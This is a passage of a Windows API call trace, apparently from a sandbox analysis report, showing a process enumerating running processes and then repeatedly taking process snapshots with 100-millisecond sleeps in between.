th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0225.314] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0225.314] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0225.314] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.314] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.315] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.315] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.315] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.316] Process32NextW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0225.318] Sleep (dwMilliseconds=0x64) [0225.419] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2b0 [0225.420] Process32FirstW (in: hSnapshot=0x2b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.426] Sleep (dwMilliseconds=0x64) [0225.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2b4 [0225.529] Process32FirstW (in: hSnapshot=0x2b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.535] Sleep (dwMilliseconds=0x64) [0225.637] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2b8 [0225.639] Process32FirstW (in: hSnapshot=0x2b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.644] Sleep (dwMilliseconds=0x64) [0225.746] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2bc [0225.748] Process32FirstW (in: hSnapshot=0x2bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.754] Sleep (dwMilliseconds=0x64) [0225.864] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2c0 [0225.866] Process32FirstW (in: hSnapshot=0x2c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.872] Sleep (dwMilliseconds=0x64) [0225.983] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2c4 [0225.984] Process32FirstW (in: hSnapshot=0x2c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.990] Sleep (dwMilliseconds=0x64) [0226.090] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2c8 [0226.091] Process32FirstW (in: hSnapshot=0x2c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.097] Sleep (dwMilliseconds=0x64) [0226.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2cc [0226.201] Process32FirstW (in: hSnapshot=0x2cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.206] Sleep (dwMilliseconds=0x64) [0226.308] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2d0 [0226.309] Process32FirstW (in: hSnapshot=0x2d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.315] Sleep (dwMilliseconds=0x64) [0226.417] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2d4 [0226.419] Process32FirstW (in: hSnapshot=0x2d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.424] Sleep (dwMilliseconds=0x64) [0226.529] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2d8 [0226.530] Process32FirstW (in: hSnapshot=0x2d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.536] Sleep (dwMilliseconds=0x64) [0226.635] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2dc [0226.637] Process32FirstW (in: hSnapshot=0x2dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.642] Sleep (dwMilliseconds=0x64) [0226.745] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e0 [0226.746] Process32FirstW (in: hSnapshot=0x2e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.752] Sleep (dwMilliseconds=0x64) [0226.909] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e4 [0226.910] Process32FirstW (in: hSnapshot=0x2e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.916] Sleep (dwMilliseconds=0x64) [0227.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e8 [0227.093] Process32FirstW (in: hSnapshot=0x2e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.141] Sleep (dwMilliseconds=0x64) [0227.260] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2ec [0227.261] Process32FirstW (in: hSnapshot=0x2ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.267] Sleep (dwMilliseconds=0x64) [0227.370] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f0 [0227.372] Process32FirstW (in: hSnapshot=0x2f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.377] Sleep (dwMilliseconds=0x64) [0227.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f4 [0227.500] Process32FirstW (in: hSnapshot=0x2f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.505] Sleep (dwMilliseconds=0x64) [0227.614] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f8 [0227.616] Process32FirstW (in: hSnapshot=0x2f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.621] Sleep (dwMilliseconds=0x64) [0227.730] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2fc [0227.733] Process32FirstW (in: hSnapshot=0x2fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.738] Sleep (dwMilliseconds=0x64) [0227.838] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x300 [0227.839] Process32FirstW (in: hSnapshot=0x300, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.845] Sleep (dwMilliseconds=0x64) [0227.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x304 [0227.947] Process32FirstW (in: hSnapshot=0x304, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.953] Sleep (dwMilliseconds=0x64) [0228.055] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x308 [0228.057] Process32FirstW (in: hSnapshot=0x308, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.062] Sleep (dwMilliseconds=0x64) [0228.174] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x30c [0228.175] Process32FirstW (in: hSnapshot=0x30c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.181] Sleep (dwMilliseconds=0x64) [0228.290] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x310 [0228.292] Process32FirstW (in: hSnapshot=0x310, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.297] Sleep (dwMilliseconds=0x64) [0228.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x314 [0228.422] Process32FirstW (in: hSnapshot=0x314, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.428] Sleep (dwMilliseconds=0x64) [0228.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x318 [0228.526] Process32FirstW (in: hSnapshot=0x318, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.531] Sleep (dwMilliseconds=0x64) [0228.633] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x31c [0228.634] Process32FirstW (in: hSnapshot=0x31c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.640] Sleep (dwMilliseconds=0x64) [0228.742] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x320 [0228.744] Process32FirstW (in: hSnapshot=0x320, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.751] Sleep (dwMilliseconds=0x64) [0228.851] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x324 [0228.853] Process32FirstW (in: hSnapshot=0x324, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.859] Sleep (dwMilliseconds=0x64) [0228.960] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x328 [0228.962] Process32FirstW (in: hSnapshot=0x328, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.967] Sleep (dwMilliseconds=0x64) [0229.069] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x32c [0229.071] Process32FirstW (in: hSnapshot=0x32c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.077] Sleep (dwMilliseconds=0x64) [0229.187] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x330 [0229.189] Process32FirstW (in: hSnapshot=0x330, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.200] Sleep (dwMilliseconds=0x64) [0229.303] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x334 [0229.305] Process32FirstW (in: hSnapshot=0x334, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.311] Sleep (dwMilliseconds=0x64) [0229.412] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x338 [0229.414] Process32FirstW (in: hSnapshot=0x338, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.420] Sleep (dwMilliseconds=0x64) [0229.522] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x33c [0229.523] Process32FirstW (in: hSnapshot=0x33c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.529] Sleep (dwMilliseconds=0x64) [0229.631] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x340 [0229.632] Process32FirstW (in: hSnapshot=0x340, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.638] Sleep (dwMilliseconds=0x64) [0229.740] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x344 [0229.742] Process32FirstW (in: hSnapshot=0x344, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.748] Sleep (dwMilliseconds=0x64) [0229.849] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x348 [0229.851] Process32FirstW (in: hSnapshot=0x348, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.856] Sleep (dwMilliseconds=0x64) [0229.958] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x34c [0229.960] Process32FirstW (in: hSnapshot=0x34c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.966] Sleep (dwMilliseconds=0x64) [0230.068] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x350 [0230.069] Process32FirstW (in: hSnapshot=0x350, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.075] Sleep (dwMilliseconds=0x64) [0230.177] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x354 [0230.179] Process32FirstW (in: hSnapshot=0x354, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.184] Sleep (dwMilliseconds=0x64) [0230.286] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x358 [0230.288] Process32FirstW (in: hSnapshot=0x358, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.293] Sleep (dwMilliseconds=0x64) [0230.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x35c [0230.397] Process32FirstW (in: hSnapshot=0x35c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.403] Sleep (dwMilliseconds=0x64) [0230.505] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x360 [0230.506] Process32FirstW (in: hSnapshot=0x360, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.512] Sleep (dwMilliseconds=0x64) [0230.614] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x364 [0230.615] Process32FirstW (in: hSnapshot=0x364, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.621] Sleep (dwMilliseconds=0x64) [0230.723] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x368 [0230.726] Process32FirstW (in: hSnapshot=0x368, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.732] Sleep (dwMilliseconds=0x64) [0230.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x36c [0230.833] Process32FirstW (in: hSnapshot=0x36c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.839] Sleep (dwMilliseconds=0x64) [0230.941] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x370 [0230.943] Process32FirstW (in: hSnapshot=0x370, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.948] Sleep (dwMilliseconds=0x64) [0231.077] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x374 [0231.110] Process32FirstW (in: hSnapshot=0x374, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.116] Sleep (dwMilliseconds=0x64) [0231.238] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x378 [0231.239] Process32FirstW (in: hSnapshot=0x378, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.245] Sleep (dwMilliseconds=0x64) [0231.380] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x37c [0231.382] Process32FirstW (in: hSnapshot=0x37c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.387] Sleep (dwMilliseconds=0x64) [0231.487] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x380 [0231.489] Process32FirstW (in: hSnapshot=0x380, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.494] Sleep (dwMilliseconds=0x64) [0231.616] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x384 [0231.617] Process32FirstW (in: hSnapshot=0x384, 